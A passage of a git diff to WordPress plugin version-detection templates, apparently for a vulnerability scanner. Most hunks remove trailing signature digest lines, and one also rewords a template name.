b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207a5bf067f51f1024a5bcd89dc41a1c0a09b4347fe52ed566d16f303bd75db1a20221009c0a8ab5adbafeb3c689f2f0c4d4188cbed9b478e3ff5dacbe63d93f46d7900b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 0e067d29b52..a79253cec50 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071d9bd3f5c57ba5908946f28f786d090e5a85d5b7e76d6b69e7f301cca3d1121022026b5df0af5b366c45408dcb67664e063843743707ff1d69517be135fc1993e0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 7d5d50b14c9..77fc04a2203 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207c6e3274e90cf19bb841a9689a36d3c1f6d379b02b2a771f2e1f6e7e89a708ce022100e1547187f3f0e9f14b94dea2f77b12c30164c81c6dc4498ce85d4f78e658a522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 51397c95b1d..733f9ee453e 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200cd989fc7c8e20b6a83760d9aae1713e149bb96a62fce18667c1ec3b73e775ba02207966d041f1b16bd2fd7c0e33bd38732332448531c2d688b8b54646da902afc16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index deb314954ce..0af08f0ac08 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000902a9a920a6eab11197982d102c4ba65970efcdf6d556c8ed09263be346e77022100fac915074abc270ef311abc6e762693543849af191a56143de289f2f91e69c66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 7601b04479f..1e4c77fbca9 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dd508b2751eddcabcdff20d6bb8a1828e45bec5d040328d4fe5154a3492b24b20221008ceb6de1609d4c0997c9677fe71d33b840239f68501e396543c1b8e885c28144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7eb6880cdeb..295e3fe82db 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008c60ee08212aca9d843600372e87a9f4a9d7d11300e92ad8894560b67a71be9302206aa943664c8700391073905ca8e15bc974ad6164da8952023e05f06c2e951a1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 9c4c4b35430..862f73201fc 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b4be7a7704d46205c25d37e8f14456f7f904433dde41610dc073ffc3a8275e6022100ac458e73aa8a7b93482cec595b910e77b9edaac3470eb87bf4ee831e45273c14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index adbc5f2a013..711b64f9d07 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae896b1301d3674d9500be4ef671983e5199ea50b9603f15f2b59783ee460cd5022050b360d91fabf00e4b23417d6f52f2c482bb6a2a550f900992505854b334a6cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 32706a10b27..58ddcfab78a 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022054134b051359bad45851f2139f85868a6f570592ca3587cd795714f7055b2c3a022045d9ff12232a51d5d6527de05435bbd951629b8f00745997a9a7457c4df0bb05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 297f8a6ee1e..305d74e8eaf 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022031a0a11424d302218964ba75428dc340c0c783ea7b28286f908f4e9af678184b022100caef77a9b4402fd1e349c5439f590d82bfcfddc0e6c2ab7f735f602294b4f956:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 5f4f8fed97e..668162fc4e1 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022023b3c7115df7f7b4a7bf2a4d1cdac7a90415ba094dc570edb3ec7b1e52ed835c0220127e9267597c7153e7031fe0b0861f826e4a46444165c63c8cb38b14d9d9175e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index cba0a643bb0..2a233f389dc 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009be555f4c3f7a15b9f921ebd25f43ef309929448564485ee3ffafacdb686916f02207867fd0d2564e965a874733f302ddca646c36248350db90b8d2e59c63ffd6d8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 85548e3202d..a0d2554492c 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100afab902835ebe06a4c3f6bda89add6b22f8b59d5949532a80c70e140ba1f92d102202083931d1e4fdcf829296d52d368cab1d562ee393bda30fa6dc668b8e6d71f77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 63e69708365..4e5046273d1 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a68024a4ac10a0a5a25a540e068c28e591833828663eb34a479d40b5dec60a6022100831b40a660b761a6a540e4fe8ba874904d4622a03658ef15eeb7ef9014dc3934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ef5ef0098af..f44cee79807 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b14504e91d2bfa06c79a61fb5d65b4ba9846c046465c5b3f5823a6e960ccb0a02210082e096ad503a4df33a6db77bdeeef642a7ee922c24c4ad66c31814b3c6805f01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 8a4b6ab32db..39130db767b 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b57bdd5ea956da81d9eb5806e6206f7d7c718f8c1feae28fdfae3c9548b0f130220207774a8ca6f320dc5a32b6632a7cc91acf97a0de8df6d846f794399fe1983d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index e40b544335e..39c497073ca 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b95983a70fa5717462902aff3f5e513a428e928530c97bc5428e9eead7c5b73c0220294caa2d40254a635049ef1cf946e7642a5b548b158244f5897dbc2b956ec261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index c838104005a..b848288b55f 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220237171643e0237a8118d83598b1b66d4cf2858948dc3e4dfb7a7b27e78e8f3fa022013aae9d90ed3a55ce1f8b02ea28fdbdc57541d4f5aad26a4df551fdda507054b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 55b1a5ed7f2..4d10178692e 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008926c686e954a7e38cc729821283c7cac69cb723d3c1ee5fa0b90faa870d7c3c022056e3ede1c4986e685b6bd70cd2f9bc7f69e4d31c99c41e8cb2bd9ece3a0b0a26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 0d8ee8452c1..7aac0a153f3 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210082c01583a98c1d17974cc2577ddc209c37191a047d911033746a745377898943022100f6cbc7e3116782ec93d07c8c974f1d959c1ade124040426793769cd040fb20c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 2a5c73a7b28..d0cebd5316c 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220492f1157d41a51af303ece9140557f61e11c57791eb81587c3fbd5eaaa02056602203a9c3832f874e1f0e5836c17ca9c0e8fe0fe351454a5abb79956f54539003cf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 776f31b48cc..ff207791572 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ef352978cd787cb7966313e2ab6f27de7fb91ede5b3017180015f0249baad60602200fcd589a4c3c4083dd778ac320e00b7917069e6f75967129e49be1895f02d754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 7d76cd5965b..fffdc7d017a 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb1e8fbfe6d296b9cff5e0acfaa9f049b14cd5d473741ed59910a57eb02ba3a302202526cfe4ee39b175ae024d9f94561c2d763b88a24e8c8a982fe32cc9a5cc7430:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 24d02d6e87c..7a9746a70d5 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220616555c2fe19ef84dff617dec3efc7de66e9dc15f2671c485470652640479872022100a5722db82d6de378132a458f427a104fc8e9ee822e8fa7517e2bcd8c33499b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 97f6b92abb8..3fe86debf56 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210095e2bcc157a54700af0a2ddaa160a6f47e38bf0cefbdbfbe1035c400a888d21002200e98d2c7f526d64286580146da0615d92c2b2fa426c80589282284b5230e1dc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 726d86e9f9f..18a7437e94b 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b6eb57784dd16537369876b2ff5f11a65ccf77ba38a75106021af81d25b264bd0220069806d282d36c29fe5b6e0897d1b4a5847bc2fcd7b1f132dbc98e16d35d154a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index dcf8274756c..3deac58709d 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e9635e8264045d6b5083462c542cbbd5ca7640154f008e7dc67654784ab949d8022100fcec7ed0c747447e9d14cfd98dd735474fb2360fb00087bdf5faa05973d3ad8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index ecacdb57bc6..e7e7c276825 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d1cfa5e4d81eb9db57fa9e3aa32f660817a2000011eb508e96bad8e7d6c60d47022100bbb559f9eb9b3a190a7e829b9e0fc05b1adf209e504510d4b5034155be855486:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c4ad2e3a9b4..ad4ebefa4b1 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201808b1eae26c3a7ce14636373d02ce88d4282a466b1948c98146e8d0373bec70022100af2754f8db6f9e6afff6135f0c464f587da4a09ea27d84edcc03f56491441934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 46d2e512870..8e88c81c0a9 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201966318daf97e10fff4b9b2df130c67bbc1d1c0fbcd03a5145d6c29d32c5fc78022100c4976cb6521a92c66c8775b15e74910a0536600e0b4a2a6a7086a8ae2001afac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 0843edc8f7c..39d269fb856 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100af693881ca89da4aae59fe2e8d7033d71e25a1abe64e7652146b2242257193be022010ea666c2f7bc81ebd2474b0acd35fafc279ba97f38ae8f9ec8687a99574ef58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 7f4e4a38ae7..fc126d83c63 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022014718c96e441c1b9e4962a7d5c29bd84bb08ed78bcf9b0b82dc13414720017d7022100d4f980f90670b3c7fec89b1c1f19ed4611b0f63b4fd57dec03c06489927fe019:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 6b4c27b3d8d..8c49a342590 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004901fbd41d0ecc2f2645b68a3edc9b905e62e20d1116ff745f3d4d5c0b01689022065ba3e0371cd96c0398a91eaff70c34a3f19351658efdeda49cafe574f0a606e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 9d7774de229..c20ed6552a4 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200cc8ad83e63310558442d79e957d6587a485362e8d5a7c546b261b43b3f2dbe0022100b7b02f36ed0c0578dd2db1855071d3a66eeb140e18f4d0526c61a33f930c3575:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 1ecb509f7fc..6ac2212b4be 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210095818d15e7e1c51908b2017bf5dda59a9be8e26ef8f9d794b34f81b3730d5250022075b4d11d7fb2e544aae98ad0b6fc9e2ebed806eec47c145ef4bb19764f851703:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 1b8a36e56d9..71c71b5ed14 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b6af8acf20eb9a85308df1379870d1ce32e55f0abaf492548c948da5e2aa08a0220694e3b0bf84dda2f44a1ef824ea9ced1292906eb8083c6a918f1e5978b4f3fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index cadfd017147..7b47adc274b 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220673064845a91119352b8388cc376bb6e062bd24c4dbd463c9cc373359a7a021d0220762888352cab5dc1f92e526cfd9b99493e2ea02cf19b26365e84dd881fd149fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 341287c9e11..286dfdaec66 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -1,7 +1,7 @@ id: wordpress-templately info: - name: Templately – Gutenberg & Elementor Template Library' 5000+ Free & Pro Ready Templates & Cloud! Detection + name: Templately – Elementor & Gutenberg Template Library' 5000+ Free & Pro Ready Templates & Cloud! Detection author: ricardomaia severity: info reference: @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e3d47731d765ee71c9ed9a3ffa2b24ace9cb710e6fa4fa90e904fea5b25643c022100d7d84692f10f9f6b087c8cf94b956743b20a86e67177ffe6f3a33b133cafc96e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index bd1098f136f..c4928059f6c 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b2c874ca7fb5f89f3f10ec4b11096110eb65da9e98f25b34461db71cc880b970221008f445b3582a68a4384218b33d1fc56f6c2af14e9332cfbcd02e915e76442fd58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index e90db8cea28..f6a7836f35a 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e562c838d0afc3cca8828b3ae82835a394cc7336e223917e7a4c5e01a55c4caf02210084d2d40d382a9a4e73aad1a59fcf1c0fb1cb2d29f37f30580d4c436bc097643a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 8f1442bc1ef..b7af708c4fa 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210085e144ebe09401f0860ff9262782d84d42a2eec9fce55d1b80876600dafa80f30220326f9c0cd33c594772b649de5f21128ff0e88ff442644557f6b3bde9e9be5859:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 13e6b533b84..61a793edf72 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b69294d21efbeacaf8dcf5de3aaad83ee56b8914a37970eda8a31d40fa56088c02200cad8e84ad0783bcd93d9cf6ed2fd5f823e0a44ebe3be6f918e16576b9058743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index a49996809dd..0da88d5d3f7 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203edc693f651430a53787cec4139841df283ded63caedca100e85d74d781475dd022100e8bf1b77ef4c1f546c40fed357acb0bba24edc3f8bf43d55503cdb0106f4331d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 86133f776f3..2b29428cf10 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e82048a94760e290fc58b06038f4a5a7ec7d9f650560fd5a9cc18e09ed449e13022100a3465fdc16589410f371ca4f5962036eadbecbb06d79b2bc0db6c7c769e087bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index eda63199978..181e619a7cf 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201f546e30cbcbc256285303254c5ed5cff76a3dd7a2bdf3fc413ce4013a262ebb022100caa49bf2c964fbb00086cb167f758b1a9c9e2fb61f1db78010971a6c4e5025e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 826f7d8b66e..8164eb44838 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 